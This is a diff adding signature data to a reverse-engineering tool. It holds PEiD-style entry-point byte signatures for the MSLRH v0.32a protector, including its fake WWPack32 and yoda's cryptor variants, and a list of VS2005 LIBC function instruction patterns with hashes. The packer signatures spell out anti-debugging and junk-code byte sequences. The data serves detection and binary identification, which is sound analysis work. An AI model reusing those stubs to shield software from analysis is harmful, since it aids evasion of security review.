+signature = 60 BE 00 90 8B 00 8D BE 00 80 B4 FF 57 83 CD FF EB 3A 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 0B 75 19 8B 1E 83 EE FC 11 DB 72 10 58 61 90 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF
+ep_only = true
+
+[[MSLRH] v0.32a (fake WWPack32 1.x) -> emadicius]
+signature = 53 55 8B E8 33 DB EB 60 0D 0A 0D 0A 57 57 50 61 63 6B 33 32 20 64 65 63 6F 6D 70 72 65 73 73 69 6F 6E 20 72 6F 75 74 69 6E 65 20 76 65 72 73 69 6F 6E 20 31 2E 31 32 0D 0A 28 63 29 20 31 39 39 38 20 50 69 6F 74 72 20 57 61 72 65 7A 61 6B 20 61 6E 64 20 52 61 66 61 6C 20 57 69 65 72 7A 62 69 63 6B 69 0D 0A 0D 0A 5D 5B 90 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF
+ep_only = true
+
+[[MSLRH] v0.32a (fake yoda's cryptor 1.2) -> emadicius]
+signature = 60 E8 00 00 00 00 5D 81 ED F3 1D 40 00 B9 7B 09 00 00 8D BD 3B 1E 40 00 8B F7 AC 90 2C 8A C0 C0 78 90 04 62 EB 01 00 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF
+ep_only = true
+
+[[MSLRH] v0.32a -> emadicius]
+signature = E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 81 83 C4 04 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 3D FF FF FF 00 EB 01 68 EB 02 CD 20 EB 01 E8 76 1B EB 01 68 EB 02 CD 20 EB 01 E8 CC 66 B8 FE 00 74 04 75 02 EB 02 EB 01 81 66 E7 64 74 04 75 02 EB 02 EB 01 81 E8 0A 00 00 00 E8 EB 0C
+ep_only = true
+
+[[MSLRH] v32a -> emadicius]
+signature = EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 81 83 C4 04 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 3D FF 0F 00 00 EB 01 68 EB 02 CD 20 EB 01 E8 76 1B EB 01 68 EB 02 CD 20 EB 01 E8 CC 66 B8 FE 00 74 04 75 02 EB 02 EB 01 81 66 E7 64 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31
+ep_only = true
+
diff --git a/1.73/Data/libc.dat b/1.73/Data/libc.dat
new file mode 100755
index 0000000..a979f06
--- /dev/null
+++ b/1.73/Data/libc.dat
@@ -0,0 +1,966 @@
+__strncoll,"PUSH R32\nPUSH DWORD PTR SS:[EBP+CONST]\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nADD ESP,CONST\nPOP EBP\nRETN",CXYH8EupfWBPi8wKP9Bkq8K8QFbSiz3PT4vMCgAAAAAAAAAAS6l9YD/QZKs8OdvB0os9zwAAAAAAAAAAPDnbwQAAAAAAAAAAwrxAVgAAAAAAAAAA,[],8724f312d7d930b017b73fcb194ec31b5061e46d,VS2005,LIBC.LIB
+___CxxFrameHandler,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nCLD\nMOV DWORD PTR SS:[EBP+CONST],R32",jrZbAwAAAAAAAAAA,voVkygAAAAAAAAAAe7L2qZyGUTichlE4OVp8YAAAAAAAAAAA3xP/6QAAAAAAAAAAKCc7MTlafGAAAAAAnIZROL6FZMpSYmcrnIZROL6FZMqchlE4nxDKfHuy9qlrIAKxayACsZyGUTichlE4UmJnK98T/+m7IZT2nIZROL6FZMqgLhZNoC4WTb6FZMoAAAAAuyGU9t8T/+lBjXwbQY18G98T/+koJzsx,fb687cb3c11335e10eee7f8ba7cd3ba2b1fbec93,VS2005,LIBC.LIB
+?_JumpToContinuation@@YGXPAXPAUEHRegistrationNode@@@Z,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nPUSH R32\nPUSH R32\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,CONST",YtYcGAAAAAAAAAAA,[],ff70b9726ce7f40af7121b64dbf7d5f0607f07e9,VS2005,LIBC.LIB
+___CxxLongjmpUnwind@4,"MOV R32,DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR DS:[R32+CONST]\nPUSH DWORD PTR DS:[R32+CONST]\nPUSH CONST\nPUSH DWORD PTR DS:[R32+CONST]\nCALL CONST\nADD ESP,CONST\nRETN CONST",YsbnLQAAAAAAAAAA,Dlp47eOiq3xdfQvOGscrcgAAAAAAAAAA5oV7ZuOiq3xdfQvO3xPA5RrHK3K7tlwsXX0LzoDOtO0AAAAAu7ZcLOaFe2bfE8DlgM607d8TwOUAAAAA3xPA5Q5aeO3mhXtmE6TvvxrHK3K7tlws46KrfIDOtO0AAAAA,34b27266e17413f81632d24a000fed9360799df5,VS2005,LIBC.LIB
+?_CallMemberFunction1@@YGXPAX00@Z,"POP R32\nPOP R32\nXCHG DWORD PTR SS:[ESP],R32\nJMP R32",na+F4wAAAAAAAAAA,[],d397476994e8454e47be6a36fea85a7ab0c4df28,VS2005,LIBC.LIB
+?_CallMemberFunction0@@YGXPAX0@Z,"POP R32\nPOP R32\nXCHG DWORD PTR SS:[ESP],R32\nJMP R32",na+F4wAAAAAAAAAA,[],d397476994e8454e47be6a36fea85a7ab0c4df28,VS2005,LIBC.LIB
+?_GetRangeOfTrysToCheck@@YAPBU_s_TryBlockMapEntry@@PBU_s_FuncInfo@@HHPAI1@Z,"CALL CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nDEC R32\nLEA R32,DWORD PTR DS:[R32+R32*4]\nCMP DWORD PTR DS:[R32+R32*4+CONST],R32\nLEA R32,DWORD PTR DS:[R32+R32*4]\nJCC CONST",uWaIUgAAAAAAAAAAFxTAAP7xc+ty6DpFOHTHa/7xc+ty6DpF3xPA5UmzN/27tlwsu7ZcLJyGUThJszf9u7ZcLEp7us+wN7MSxwukiTh0x2u7tlwsSbM3/bu2XCwXFMAAsDezEru2XCzfE8Dlcug6RblmiFL+8XPrSnu6z7u2XCzfE8Dl/vFz6wAAAAAAAAAAnIZROLu2XCwXFMAA,[],be6a8d4507294ceb7bfefbae5ed414816a5bb54f,VS2005,LIBC.LIB
+?_UnwindNestedFrames@@YGXPAUEHRegistrationNode@@PAUEHExceptionRecord@@@Z,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nPUSH R32\nPUSH R32\nPUSH R32\nPUSH R32\nMOV R32,DWORD PTR FS:[0]",+n3ITQAAAAAAAAAA,67idUgAAAAAAAAAA,e65a060002cbfff439a85ea07ac12c7826047ace,VS2005,LIBC.LIB
+?_CallMemberFunction2@@YGXPAX00H@Z,"POP R32\nPOP R32\nXCHG DWORD PTR SS:[ESP],R32\nJMP R32",na+F4wAAAAAAAAAA,[],d397476994e8454e47be6a36fea85a7ab0c4df28,VS2005,LIBC.LIB
+?_CallSETranslator@@YAHPAUEHExceptionRecord@@PAUEHRegistrationNode@@PAX2PBU_s_FuncInfo@@H1@Z,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nAND DWORD PTR SS:[EBP+CONST],0\nMOV DWORD PTR SS:[EBP+CONST],0",jEGmw0SJYr0DK+eLAyvni3OiGWEAAAAARIlivXOiGWEAAAAAc6IZYQAAAAAAAAAA,[],516cbcbb0e9ff1a1897b4c35dbea26ccd5985504,VS2005,LIBC.LIB
+?_CallCatchBlock2@@YAPAXPAUEHRegistrationNode@@PBU_s_FuncInfo@@PAXHK@Z,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND DWORD PTR SS:[EBP+CONST],0\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",DKUKYwAAAAAAAAAA,0dEoTQAAAAAAAAAA2e8PcNHRKE3iszlf4rM5XwAAAAAAAAAA,c31f42ed166a0627be8ae2e5336eba738bdeef04,VS2005,LIBC.LIB
+?name@type_info@@QBEPBDXZ,"PUSH R32\nCALL CONST\nINC R32\nPUSH R32\nCALL CONST\nPUSH R32\nPUSH R32\nMOV DWORD PTR DS:[R32+CONST],R32",kH1nSRTEiGoAAAAAFMSIah5Q3S9R2R0fUdkdHxTEiGoAAAAAHlDdL9iy05kAAAAAcMiU5Niy05mQfWdJ2LLTmQAAAAAAAAAA,[],ee80368be2041dd329a3ba8e77332bf93c4258fe,VS2005,LIBC.LIB
+_strpbrk,"LEA R32,DWORD PTR DS:[R32+CONST]\nADD ESP,CONST\nPOP R32\nLEAVE\nRETN",1ZDj64/izv0AAAAA5qY8ceA6CxjVkOPr4DoLGBehh26qtBmvj+LO/Rehh26qtBmvj+LO/eA6CxjVkOPrqrQZr4/izv1OVuV1TlbldQAAAAAAAAAAF6GHbgAAAAAAAAAA,[],e2fb7a42c338c051f3987a13a8f54ff8c42e7a70,VS2005,LIBC.LIB
+__wcwild,"LEA R32,DWORD PTR DS:[R32*4+CONST]\nPUSH R32\nCALL CONST\nTEST R32,R32\nPOP R32\nJCC CONST",re3reNF0+9Y9x4AMJHG4hU+LzArjcxr7S6l9YE+LzArjcxr7PceADAcQTmYAAAAA0XT71ooLKAWc+wQv43Ma+0upfWAAAAAAnPsEL2+twNoAAAAAT4vMCgAAAAAAAAAAigsoBcK8QFbEkqZoBxBOZsK8QFbEkqZob63A2sK8QFbEkqZoxJKmaMZr930AAAAAKo4tAnLoOkUAAAAAcug6RTl8Awu0QwJrtEMCa3LoOkUAAAAAOXwDC4U6hg/CvEBWwrxAVgAAAAAAAAAA/f9jIyqOLQKt7et4hTqGD3LoOkUAAAAAcug6RSRxuIUla7R7xmv3fSqOLQKt7et4JWu0e3LoOkUAAAAA,[],0a348a101b67d68efff46212586a5269dfe09084,VS2005,LIBC.LIB
+__wfreopen,"PUSH R32\nMOV R32,DWORD PTR SS:[ESP+CONST]\nTEST BYTE PTR DS:[R32+CONST],CONST\nJCC CONST",9sNCugAAAAAAAAAAuZvuqvbDQroAAAAAxNeAT/bDQrq5m+6q,[],3139d69439fa8c1b826409c5cd5d41fc8279eff8,VS2005,LIBC.LIB
+___from_strstr_to_strchr,"OR R8,CONST\nPOP R32\nADD R8,CONST\nSBB BYTE PTR DS:[R32+CONST],R8\nSBB R8,CONST\nDEC R32\nADC BYTE PTR DS:[R32+CONST],R8\nLEAVE",6FWr2p4JE7/oVava6FWr2lndh3ZY2ig6WNooOp4JE79Z3Yd20MwxkAAAAAAAAAAAWd2HdiYLiBgAAAAAJguIGAAAAAAAAAAAhHCHHTY9VQTYzQSm2M0Eplndh3bYzQSm2M0EpjY9VQTYzQSmPzBblHabVGZcpTmJ2M0Eplndh3bLaBJKy2gSSjY9VQTYzQSm2M0Eplndh3bYzQSm2M0Epmvi4WrYzQSmXKU5idDMMZDYzQSm2M0Eplndh3Zeo4MnXqODJ54JE78AAAAA2M0EpiYLiBhY2ig6a+LhagAAAAAAAAAAWNooOlylOYl2m1RmNj1VBAAAAAAAAAAAdptUZp4JE78AAAAANj1VBAAAAAAAAAAANj1VBAAAAAAAAAAAngkTv4Rwhx3oVava,[],4b84ae69ca9063ab85075051708764acb0c33851,VS2005,LIBC.LIB
+_strchr,"XOR R32,R32\nMOV R8,BYTE PTR SS:[ESP+CONST]\nPUSH R32\nMOV R32,R32\nSHL R32,CONST\nMOV R32,DWORD PTR SS:[ESP+CONST]\nTEST CONST2,CONST\nJCC CONST",2M0Eplndh3bYzQSmn5xpMnabVGZcpTmJ2M0EpjY9VQTYzQSm2M0Eplndh3bLaBJKy2gSSjY9VQTYzQSm2M0Eplndh3bYzQSm2M0Epmvi4WrYzQSmXKU5iWLuXvPYzQSm2M0Eplndh3Zeo4MnXqODJ54JE78AAAAA2M0EpiYLiBhY2ig6a+LhagAAAAAAAAAAWNooOlylOYl2m1RmNj1VBAAAAAAAAAAAdptUZp4JE78AAAAANj1VBAAAAAAAAAAANj1VBAAAAAAAAAAAngkTv4Rwhx3oVava6FWr2p4JE7/oVava6FWr2lndh3ZY2ig6WNooOp4JE79Z3Yd2Yu5e8wAAAAAAAAAAWd2HdiYLiBgAAAAAJguIGAAAAAAAAAAAhHCHHTY9VQTYzQSm,[],bc7d712c6818e10314f95fdd75ab74205cc3470a,VS2005,LIBC.LIB
+_bsearch,"PUSH DWORD PTR SS:[EBP+CONST]\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL DWORD PTR SS:[EBP+CONST]\nNEG R32\nSBB R32,R32\nPOP R32\nNOT R32\nAND R32,DWORD PTR SS:[EBP+CONST]",5OWyAibu4WXkUryfZesQzI+bWk33Zl4vIYd5Y639GrnbWm4yJu7hZaqT3bIAAAAAuyGU9uRSvJ8m7uFlqpPdsgAAAAAAAAAAJu7hZbshlPYAAAAA92ZeL4+bWk0AAAAADczAAaqT3bIAAAAAj5taTQ3MwAEhh3ljcug6RSbu4WV/0gTlEWQzg7shlPYAAAAAf9IE5aqT3bIAAAAArf0auSbu4WUAAAAA21puMibu4WURZDOD5FK8n3LoOkVl6xDM,[],8fe194c3abecf15d5c136e908efe82ccb7b389e3,VS2005,LIBC.LIB
+__mbsnbcmp,"DEC DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOVZX R16,BYTE PTR DS:[R32]\nMOVZX R32,R8\nINC R32\nTEST BYTE PTR DS:[R32+CONST],CONST\nJCC CONST",XqODJzNvNx8AAAAAADmPt6qT3bIAAAAAM283HzNvNx+chlE4x6kDXwAAAAAAAAAAqpPdsgAAAAAAAAAAnIZROI/izv2PLYWNjy2FjcepA19eo4MnXqODJ4z41XgAAAAAj+LO/WNlzdsNzMABDczAATNvNx8AAAAAY2XN24z41XichlE4M283H4z41XichlE471hmHMepA18kA8OdnIZROA3MwAF1RrPRdUaz0dFmYdMNzMABJAPDnUyZAcCMCotiDczAAYz41XgAAAAA0WZh0wA5j7eM+NV4jAqLYqqT3bIAAAAAjPjVeAA5j7eM+NV4jPjVeMepA19BjXwbQY18G8epA19eo4MnTJkBwDNvNx+chlE4,[],facb2ccaa757b0d9e209efc55fe1df657a178543,VS2005,LIBC.LIB
+__wchmod,"CALL DWORD PTR DS:[0]\nPUSH R32\nCALL CONST\nPOP R32\nOR R32,CONST\nRETN",qx70DlLONpUD9syIp+n+4qse9A4AAAAAotec1VLONpUD9syIUs42lQAAAAAAAAAAMETjpAP2zIgw/HwiA/bMiAAAAAAAAAAAMPx8IqLXnNWn6f7i,[],7bcc0bb7775e60b8ef972379103e74f305faed3d,VS2005,LIBC.LIB
+_asctime,"MOV BYTE PTR DS:[R32],CONST\nADD R32,CONST\nMOV BYTE PTR DS:[R32],CONST\nPUSH DWORD PTR DS:[R32+CONST]\nINC R32\nPUSH R32\nCALL CONST\nMOV BYTE PTR DS:[R32],CONST",GkRQEh/cY/UBzMv+AczL/gAAAAAAAAAAH9xj9R/cY/UBzMv+,[],5fff6a4021c61e183fa832f360cf108384581eae,VS2005,LIBC.LIB
+___crtGetEnvironmentStringsA,"SUB R32,R32\nINC R32\nMOV EBP,R32\nPUSH EBP\nCALL CONST\nMOV R32,R32\nPOP R32\nCMP R32,R32",kQtNgCbu4WVyE5fLQTVVJZELTYAZpmb/cOYe58I+mhAAAAAAchOXy3LoOkUAAAAAqlDSO8I+mhAAAAAAP0MFqsI+mhAAAAAATv0LFLu2XCxy6DpFcug6RWv4erW0fgIdu7ZcLCbu4WVy6DpFtH4CHSbu4WVr+Hq1cug6Rdilo2pkQBq4ZEAauCbu4WXYpaNqa/h6tVjtGt2+knn42KWjagK8TyuvIf/0vpJ5+L6Sefi+knn4ryH/9K8h//SvIf/0vpJ5+L6SefhY7RrdryH/9K8h//QCvE8rWO0a3T9DBaq7XxDwArxPKxRiIlwNzMAByH8o1k79CxRBNVUlDczAAT9DBaoAAAAAFGIiXMI+mhAAAAAAu18Q8D9DBaqRdpOiP0MFqsI+mhAAAAAAGaZm/3LoOkUAAAAAJu7hZcI+mhAAAAAAkXaToqpQ0jtw5h7nwj6aEAAAAAAAAAAA,[],1093aee18411629c1772398f60f69cf2b5a59f23,VS2005,LIBC.LIB
+__mbsinc,"MOV R32,DWORD PTR SS:[ESP+CONST]\nMOVZX R32,BYTE PTR DS:[R32]\nMOV R8,BYTE PTR DS:[R32+CONST]\nAND R8,CONST\nINC R32\nTEST R8,R8\nJCC CONST",h0dSPwGhdbMAAAAAAaF1swAAAAAAAAAAE7dTOgGhdbOHR1I/,[],05522f2380c1bac07976c416b5cb49e1a8bcc7eb,VS2005,LIBC.LIB
+_remove,"PUSH R32\nCALL CONST\nPOP R32\nOR R32,CONST\nRETN",lVAczHLoOkUAAAAAJu7hZXLoOkUAAAAAcug6RVLONpUIpA1ACKQNQAAAAAAAAAAA+RqFzSbu4WWVUBzMUs42lQAAAAAAAAAA,[],5342bcfe27c9488772dba5d0e1e5a00815fbb890,VS2005,LIBC.LIB
+__unlink,PUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nRETN,x2MDRgAAAAAAAAAA,lVAczHLoOkUAAAAAJu7hZXLoOkUAAAAAcug6RVLONpUIpA1ACKQNQAAAAAAAAAAA+RqFzSbu4WWVUBzMUs42lQAAAAAAAAAA,efed97183fc4e9f79b547a23bc81a326507cf398,VS2005,LIBC.LIB
+_wmainCRTStartup,"PUSH CONST\nCALL CONST\nPOP R32\nAND DWORD PTR SS:[EBP+CONST],0\nCALL CONST\nCALL CONST\nMOV DWORD PTR DS:[0],R32\nCALL CONST",lBvbJmpSTcNlVw8CalJNwwAAAAAAAAAAZVcPAgAAAAAAAAAA,[],1b72f3e3538aed7ee7c9f56a82cd528d1a8fa6ac,VS2005,LIBC.LIB
+__amsg_exit,CALL CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPUSH CONST\nCALL DWORD PTR DS:[0]\nPOP R32\nPOP R32\nRETN,7g2DFgAAAAAAAAAAJAPDne4NgxapmnivqZp4rwAAAAAAAAAA,[],32bc04377ea50476fc61ba6b350b5b1cc663d23c,VS2005,LIBC.LIB
+__wsetlocale,"INC R32\nLEA R32,DWORD PTR DS:[R32+R32]\nPUSH R32\nCALL CONST\nTEST R32,R32\nPOP R32\nMOV DWORD PTR DS:[0],R32\nJCC CONST",ync6Dg3MwAFm9r8YmOLhLw3MwAHKdzoOVGP3nWLSRrMAAAAAPceADGLSRrMAAAAA9rwdQg3MwAGY4uEvYtJGsw3MwAEAAAAAH1WMI/a8HULbhZMsDczAATlafGAAAAAAkdxV+fa8HUI9x4AMZva/GFL7LrtUY/ed24WTLA3MwAGR3FX5OVp8YAAAAAAAAAAAUvsuuzlafGAAAAAA,[],aa459aac823db15b576abe884178cb6ed38779a3,VS2005,LIBC.LIB
+__wsplitpath,"MOV R32,CONST\nPUSH R32\nPUSH DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV WORD PTR DS:[R32+R32*2],R16\nJMP SHORT CONST",xAVusp7II7QAAAAAm3ZG2+uC5sgAAAAA67B9s0L41tbiYlRxLlW5/kL41tYdnEWuan4lx0L41tbiYlRx1w27Zy5Vuf7qMoS4nsgjtOoyhLjSAE6xHZxFrkL41tYAAAAAQvjW1gAAAAAAAAAAD5VyOC5Vuf7P62Ic0gBOsS5Vuf67IZT26jKEuAwLAUjqMoS4LlW5/i5Vuf5JRSHEuyGU9qA3OqFAZUKdLlW5/kL41tbiYlRxDAsBSOoyhLjSAE6x4mJUceIWZUubdkbbz+tiHC5Vuf4uVbn+m3ZG2xIebw0AAAAALlW5/sSSpmgZ65H/hupSLC5Vuf4AAAAAm3ZG2ygAft0AAAAAEh5vDS5Vuf4AAAAA4hZlS0L41tYAAAAAKAB+3UL41tYAAAAAxJKmaDUXu7AAAAAALlW5/jUXu7DXDbtnoDc6oS5Vuf4AAAAALlW5/i5Vuf4HVM8iNRe7sC5Vuf7qMoS4B1TPIiqzQt6bdkbbQGVCnYbqUiybdkbbSUUhxC5Vuf5y6DpFGeuR/zUXu7AAAAAALlW5/i5Vuf5y6DpFcug6RS5Vuf67IZT2uyGU9i5Vuf5AZUKdKrNC3uuC5sgAAAAAQGVCneuwfbObdkbb6jKEuAwLAUjqMoS464LmyC5Vuf4AAAAA6jKEuJ7II7TEBW6ym3ZG22p+JccAAAAA,[],fc11903147c196c55833cadff384387079b21259,VS2005,LIBC.LIB
+___crtsetenv,"LEA R32,DWORD PTR DS:[R32*4+CONST]\nPUSH R32\nPUSH R32\nCALL CONST\nPOP R32\nTEST R32,R32\nPOP R32\nJCC CONST",Rl1bjCSjmVy7IZT2oGquK5yGUTgAAAAAaRFRLSSjmVxJzsp3Sc7Kd3LoOkXfE8DlmPOxDXLoOkXfE8DlCElxqZyGUTheo4MnuyGU9iSjmVwNf6ibDX+om3LoOkWBnbFWrANXEJyGUTgAAAAAnIZROGZ5MTV2Xfeedl33nmZ5MTXyYW2xgZ2xVpjzsQ27IZT23xPA5XLoOkVy6DpFTFWqfySjmVxGXVuMcug6Raz8UlkY8LpbGPC6W98TwOUAAAAAcug6RZjzsQ27IZT2uyGU9oejbX0VojFW8mFtsWZ5MTUAAAAAFaIxVoejbX1SaOpb3xPA5QhJcanzqZPP86mTz98TwOUAAAAAUmjqW5jzsQ0ko5lcJKOZXEL41tYAAAAAQvjW1gAAAAAAAAAAh6NtfWZ5MTVpEVEtaRFRLSSjmVyElh6aXqODJ6wDVxAAAAAArPxSWZyGUTgAAAAAZnkxNUL41tYAAAAAcug6RWZ5MTVy6DpFhJYempjzsQ1pEVEtcug6RajR9JEm7uFlJu7hZajR9JEAAAAAqNH0kSSjmVygaq4r,[],610b802e3e89940a3b94c975b269f808ede0f3ce,VS2005,LIBC.LIB
+__wincmdln,"MOVZX R32,R8\nPUSH R32\nCALL CONST\nTEST R32,R32\nPOP R32\nJCC CONST",FMSIao/izv3o/oHQ6JIEkxTEiGrYzQSm6P6B0I/izv0AAAAAJAPDnVCj5LC4fOc7UKPksNjNBKbokgST2M0EphTEiGokdEmaYZqBiWGagYmP4s79JHRJmuiSBJPo/oHQuHznO9jNBKbokgSTj+LO/U+LzArYzQSm2M0Epo/izv1hmoGJ2M0Epuj+gdBPi8wKT4vMCgAAAAAAAAAA6P6B0OiSBJMAAAAA,[],56d112b0d0758c7747ae3cb823d97a9a812d8d04,VS2005,LIBC.LIB
+__write,"MOV BYTE PTR DS:[R32],R8\nINC R32\nMOV R32,R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nSUB R32,R32\nCMP R32,CONST\nJCC CONST",oDc6oUL41tYAAAAAD5lLxCSjmVwAAAAA6OF8arIMIEbuuSCNhnY75ySjmVwAAAAArQVGs4Z2O+dlqJ5X7rkgjbIMIEYAAAAAJKOZXEL41tYAAAAAsgwgRux2hrtw874sQvjW1gAAAAAAAAAABr85gWxmG5zS9DMScPO+LGxmG5zSAE6xZaieV9jNBKZmeTE1bGYbnCB89k0AAAAA0vQzEtse7sYAAAAAZnkxNUL41tYAAAAA2M0Epl5QTlLIskrXbGYbnNse7sYAAAAAyLJK115QTlIAAAAAc7c7NSSjmVwAAAAAXlBOUga/OYF0uoNl0gBOsSB89k3sdoa7kow9N9u5Jne9Mlzp7HaGuwI+saogfPZNdLqDZZKMPTcCPrGqvTJc6WZ5MTXbuSZ3IHz2TaA3OqG7IZT22x7uxqA3OqG7IZT227kmdySjmVwAAAAAlD9GcoZ2O+etBUazAj6xqux2hrsAAAAAuyGU9pKMPTeiEuI67HaGu3Dzvizo4XxqohLiOnO3OzUPmUvE,[],9026d112cdbc5d6e726e2190a17a81d6935ebc93,VS2005,LIBC.LIB
+___init_collate,"XOR R32,R32\nRETN",Us42lQAAAAAAAAAA,[],2c4970053791676276ea7814b8d80555f3d32390,VS2005,LIBC.LIB
+__ismbcsymbol,"MOV R32,DWORD PTR SS:[ESP+CONST]\nCMP R32,CONST\nJCC CONST",6FWr2lLONpVSDvi0ZoKcu1LONpWMhZm9Ug74tAAAAAAAAAAAUs42lQAAAAAAAAAAjIWZvVLONpXoVava6FWr2lLONpXoVava,[],0f68da8ea5d082af3904324ef80095b21bba41b4,VS2005,LIBC.LIB
+__ismbckata,"MOV R32,DWORD PTR SS:[ESP+CONST]\nCMP R32,CONST\nJCC CONST",Us42lQAAAAAAAAAAjIWZvVLONpXoVava6FWr2lLONpXoVava6FWr2lLONpVSDvi0ZoKcu1LONpWMhZm9Ug74tAAAAAAAAAAA,[],adf80a14a7cc913fbd12271ff34476dc6d91c2d6,VS2005,LIBC.LIB
+__ismbchira,PUSH CONST\nPOP R32\nRETN,Us42lQAAAAAAAAAA9vATL1LONpVSDvi09vATL1LONpX28BMvZoKcu1LONpX28BMvUg74tAAAAAAAAAAA,[],0cf18e03cf83a7b9007eb4aaa4080b3609e2ac2a,VS2005,LIBC.LIB
+_atan2,"PUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nADD ESP,CONST\nWAIT\nFSTCW WORD PTR SS:[EBP+CONST]\nCALL CONST\nCALL CONST\nPOP R32",zm5U+AAAAAAAAAAAgL+herC5Og4AAAAAIYd5Y85uVPhkZzDaZGcw2gAAAAAAAAAA/MSgqvzEoKoAAAAAsLk6DiGHeWOEZCGP/MSgqoC/oXoAAAAAhGQhjwAAAAAAAAAA,[],863d1a02c8433e93b1c60cf98f53d197c2b37645,VS2005,LIBC.LIB
+__CIatan2,"PUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nADD ESP,CONST\nWAIT\nFSTCW WORD PTR SS:[EBP+CONST]\nCALL CONST\nCALL CONST\nPOP R32",zm5U+AAAAAAAAAAA/MSgqrC5Og4AAAAAIYd5Y85uVPhkZzDaZGcw2gAAAAAAAAAAsLk6DiGHeWOEZCGPhGQhjwAAAAAAAAAA,[],7cc84f8b7ab66c897d04eefeb321a4f800365b34,VS2005,LIBC.LIB
+?__ArrayUnwind@@YGXPAXIHP6EX0@Z@Z,"OR DWORD PTR SS:[EBP+CONST],CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR FS:[0],R32\nPOP R32\nPOP R32\nPOP R32\nLEAVE\nRETN CONST",a8Vc4d8TwOUAAAAA3xPA5ZhwbBZrxVzhk4Bz5ZhwbBZrxVzhmHBsFgAAAAAAAAAA,[],9b1e8988aa0824f17863b5e1c278d7685ad5c233,VS2005,LIBC.LIB
+??_M@YGXPAXIHP6EX0@Z@Z,"MOV DWORD PTR SS:[EBP+CONST],CONST\nOR DWORD PTR SS:[EBP+CONST],CONST\nCALL CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR FS:[0],R32\nPOP R32\nPOP R32\nPOP R32",3xPA5ZkLeIMVODY+UfIh698TwOUAAAAAmQt4gwAAAAAAAAAAFTg2Pt8TwOUAAAAA,[],37862fc88b3af849b9a6f97a3ced93c129188875,VS2005,LIBC.LIB
